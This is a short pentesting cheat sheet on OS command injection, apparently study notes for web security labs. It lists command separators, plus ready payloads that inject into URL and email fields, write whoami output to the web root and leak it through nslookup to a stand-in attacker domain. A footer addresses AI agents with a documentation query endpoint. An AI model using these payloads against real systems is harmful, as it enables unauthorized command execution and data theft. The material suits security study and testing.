# OS command injection

## Where to test:

1.different functionality is implemented by calling out to a shell command with parameter such as,the product and store IDs as arguments:

```
https://insecure-website.com/stockStatus?productID=381&storeID=29
```

maybe this will interpreted in serverside like this,

```
stockreport.pl 381 29
```

And there is a possibility of os command injection.

such as:

```
stockreport.pl & echo aiwefwlguh & 29
```

## Ways of injecting:

1. Identify:

```bash
& echo aiwefwlguh & 
```

2. command separators on both Windows and Unix-based systems:

```bash
command1 ; command2   # Execute command1 and then command2
command1 && command2 # Execute command2 only if command1 succeeds
command1 || command2 # Execute command2 only if command1 fails
command1 & command2  # Execute command1 in the background
command1 | command2  # Pipe the output of command1 into command2
```

3. command separators work only on Unix-based systems:

```bash
;
Newline (0x0a or \n)
`injected command `
$(injected command )
```

### payload:

```bash
& ping -c 10 127.0.0.1 &
|ping -n 11 127.0.0.1||ping -c 11 127.0.0.1
& whoami > /var/www/static/whoami.txt &
& nslookup kgji2ohoyw.web-attacker.com &
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

```

## Example:

```bash
email=x||ping+-c+10+127.0.0.1||
email=x|ping -n 11 127.0.0.1||ping -c 11 127.0.0.1
email=||whoami>/var/www/images/output.txt||
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||

```

### Useful Commands:

<pre class="language-bash"><code class="lang-bash"><strong><a data-footnote-ref href="#user-content-fn-1">Linux	       Windows</a>
</strong>whoami	       whoami
uname -a       ver
ifconfig       ipconfig /all
netstat -an    netstat -an
ps -ef	       tasklist
</code></pre>

[^1]:


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shahidulandshamim.gitbook.io/web-application/exploitation/os-command-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.